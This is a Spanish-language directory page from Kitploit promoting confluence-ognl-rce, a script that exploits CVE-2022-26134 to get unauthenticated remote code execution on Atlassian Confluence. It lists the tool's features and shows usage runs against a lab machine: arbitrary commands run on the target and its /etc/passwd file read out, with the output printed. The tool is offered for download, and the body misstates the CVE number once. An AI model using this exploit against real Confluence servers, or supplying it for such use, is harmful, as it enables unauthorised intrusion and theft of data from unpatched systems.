Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
confluence-ognl-rce — Confluence RCE no autenticado (CVE-2022-26134) | Kitploit
Herramientas/GitHubGitHub/crypt0lith/confluence-ognl-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubcrypt0lith/confluence-ognl-rce

confluence-ognl-rce

Confluence RCE no autenticado (CVE-2022-26134)

Ver Repositorio
hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-26134 - Ejecución remota de código OGNL en Atlassian Confluence

Este script es un envoltorio sobre una primitiva de explotación de ejecución remota de código no autenticada mediante inyección OGNL en Confluence Data Center y Server (CVE-2022-26314).

  • Aviso del proveedor

Fue inspirado originalmente por el PoC through_the_wire.py, con algunas "mejoras" que he añadido:

  • RCE real mediante codificación base64 del comando
  • lectura de scripts con -c @/ruta/al/archivo; consciente de shebang (consulte ejemplo de uso)
  • sin dependencia de netcat; sockets nativos de Python para la salida de comandos y lectura de archivos
  • verificación preliminar de vulnerabilidad
  • resolución iface -> addr LHOST al estilo Metasploit

ejemplo de uso

Algunos ejemplos de la máquina Proving Grounds Flu:

root@kitploit:~
kali@kali:~/ctf/offsec/pg/flu$ cat test.py               
#!/usr/bin/env python3
import sys;print(sys.version)
                                                                                                                                                                                                                  
kali@kali:~/ctf/offsec/pg/flu$ ./cve-2022-26134.py -c '@test.py' http://192.168.159.41:8090 tun0 2>/dev/null
3.11.4 (main, Dec  7 2023, 15:43:41) [GCC 12.3.0]
                                                                                                                                                                                                                  
kali@kali:~/ctf/offsec/pg/flu$ ./cve-2022-26134.py -c 'id;hostname;ip a' http://192.168.159.41:8090 tun0            
[*] target is vulnerable
uid=1001(confluence) gid=1001(confluence) groups=1001(confluence)
flu
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:86:cc:58 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    inet 192.168.159.41/24 brd 192.168.159.255 scope global ens160
       valid_lft forever preferred_lft forever
                                                                                                                                                                                                                  
kali@kali:~/ctf/offsec/pg/flu$ ./cve-2022-26134.py --readfile '/etc/passwd' http://192.168.159.41:8090 tun0 2>/dev/null | head
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
Descargar herramienta